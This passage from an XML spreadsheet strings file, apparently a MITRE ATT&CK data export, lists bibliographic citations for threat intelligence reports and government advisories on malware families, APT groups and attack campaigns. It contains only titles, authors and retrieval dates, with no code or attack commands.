    <t>Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Cybercrime &amp; Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.</t>
  </si>
  <si>
    <t>Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Oliveira, A. (2019, May 30). Infected Containers Target Docker via Exposed APIs. Retrieved April 6, 2021.</t>
  </si>
  <si>
    <t>Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.</t>
  </si>
  <si>
    <t>Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.</t>
  </si>
  <si>
    <t>Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.</t>
  </si>
  <si>
    <t>Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.</t>
  </si>
  <si>
    <t>Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.</t>
  </si>
  <si>
    <t>Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.</t>
  </si>
  <si>
    <t>Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.</t>
  </si>
  <si>
    <t>Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>Borja, A. Camba, A. et al (2020, September 14). Analysis of a Convoluted Attack Chain Involving Ngrok. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Hacquebord, F.. (2017, April 25). Two Years of Pawn Storm: Examining an Increasingly Relevant Threat. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.</t>
  </si>
  <si>
    <t>Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.</t>
  </si>
  <si>
    <t>Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.</t>
  </si>
  <si>
    <t>Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.</t>
  </si>
  <si>
    <t>Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.</t>
  </si>
  <si>
    <t>Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.</t>
  </si>
  <si>
    <t>Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency Miners: A Battle for Resources. Retrieved April 6, 2021.</t>
  </si>
  <si>
    <t>Su, V. et al. (2019, December 11). Waterbear Returns, Uses API Hooking to Evade Security. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.</t>
  </si>
  <si>
    <t>Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.</t>
  </si>
  <si>
    <t>Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.</t>
  </si>
  <si>
    <t>Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021.</t>
  </si>
  <si>
    <t>Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.</t>
  </si>
  <si>
    <t>TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.</t>
  </si>
  <si>
    <t>Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.</t>
  </si>
  <si>
    <t>Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.</t>
  </si>
  <si>
    <t>Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.</t>
  </si>
  <si>
    <t>Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.</t>
  </si>
  <si>
    <t>Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go phishing. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.</t>
  </si>
  <si>
    <t>Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>Hacquebord, F. (n.d.). Pawn Storm in 2019 A Year of Scanning and Credential Phishing on High-Profile Targets. Retrieved December 29, 2020.</t>
  </si>
  <si>
    <t>Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.</t>
  </si>
  <si>
    <t>TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.</t>
  </si>
  <si>
    <t>Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.</t>
  </si>
  <si>
    <t>Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.</t>
  </si>
  <si>
    <t>Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.</t>
  </si>
  <si>
    <t>Horejsi, J., et al. (2018, March 14). Tropic Trooper’s New Strategy. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.</t>
  </si>
  <si>
    <t>Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>Caragay, R. (2014, December 11). Info-Stealing File Infector Hits US, UK. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.</t>
  </si>
  <si>
    <t>Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Gabrielle Joyce Mabutas, Luis Magisa, Steven Du. (2020, July 17). Updates on Quickly-Evolving ThiefQuest macOS Malware. Retrieved April 26, 2021.</t>
  </si>
  <si>
    <t>Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.</t>
  </si>
  <si>
    <t>Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Ionut Illascu. (2021, July 14). Trickbot updates its VNC module for high-value targets. Retrieved September 10, 2021.</t>
  </si>
  <si>
    <t>Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.</t>
  </si>
  <si>
    <t>Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>This designation has been used in reporting both to refer to the threat group ([Skeleton Key](https://attack.mitre.org/software/S0007)) and its associated malware.(Citation: Symantec APT28 Oct 2018)</t>
  </si>
  <si>
    <t>TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware &amp; Configuration Analysis. Retrieved July 15, 2020.</t>
  </si>
  <si>
    <t>Merritt, E.. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.</t>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two – The Uninstaller. Retrieved July 23, 2020.</t>
  </si>
  <si>
    <t>Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief . Retrieved July 27, 2020.</t>
  </si>
  <si>
    <t>Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Glyer, C. (2018, April 14). @cglyer Status Update. Retrieved October 11, 2018.</t>
  </si>
  <si>
    <t>Carr, N.. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Carr, N.. (2018, October 25). Nick Carr Status Update. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Carr, N.. (2017, April 6). Retrieved June 29, 2017.</t>
  </si>
  <si>
    <t>Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>UCF. (n.d.). The system must require username and password to elevate a running application.. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>UCF. (n.d.). Unauthorized accounts must not have the Create symbolic links user right.. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.</t>
  </si>
  <si>
    <t>UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.</t>
  </si>
  <si>
    <t>UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.</t>
  </si>
  <si>
    <t>UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. Retrieved May 17, 2022.</t>
  </si>
  <si>
    <t>Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.</t>
  </si>
  <si>
    <t>Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.</t>
  </si>
  <si>
    <t>US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.</t>
  </si>
  <si>
    <t>US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.</t>
  </si>
  <si>
    <t>US-CERT. (n.d.). Risks of Default Passwords on the Internet. Retrieved April 12, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.</t>
  </si>
  <si>
    <t>US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.</t>
  </si>
  <si>
    <t>US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2017, March 16). SMB Security Best Practices. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.</t>
  </si>
  <si>
    <t>Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and        /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021.</t>
  </si>
  <si>
    <t>Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.</t>
  </si>
  <si>
    <t>skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.</t>
  </si>
  <si>
    <t>Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.</t>
  </si>
  <si>
    <t>McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.</t>
  </si>
  <si>
    <t>Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.</t>
  </si>
  <si>
    <t>Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.</t>
  </si>
  <si>
    <t>Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.</t>
  </si>
  <si>
    <t>Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.</t>
  </si>
  <si>
    <t>Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.</t>
  </si>
  <si>
    <t>Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.</t>
  </si>
  <si>
    <t>Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021.</t>
  </si>
  <si>
    <t>Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.</t>
  </si>
  <si>
    <t>Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>Hsu, K. et al. (2020, June 24). Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.</t>
  </si>
  <si>
    <t>Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.</t>
  </si>
  <si>
    <t>Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Falcone, R. (2018, August 07). DarkHydrus Uses Phishery to Harvest Credentials in the Middle East. Retrieved August 10, 2018.</t>
  </si>
  <si>
    <t>Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.</t>
  </si>
  <si>
    <t>Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.</t>
  </si>
  <si>
    <t>Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.</t>
  </si>
  <si>
    <t>Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.</t>
  </si>
  <si>
    <t>Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.</t>
  </si>
  <si>
    <t>Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.</t>
  </si>
  <si>
    <t>Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.</t>
  </si>
  <si>
    <t>Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.</t>
  </si>
  <si>
    <t>Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.</t>
  </si>
  <si>
    <t>Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.</t>
  </si>
  <si>
    <t>Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.</t>
  </si>
  <si>
    <t>Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.</t>
  </si>
  <si>
    <t>Harbison, M. (2021, February 9). BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech. Retrieved February 16, 2021.</t>
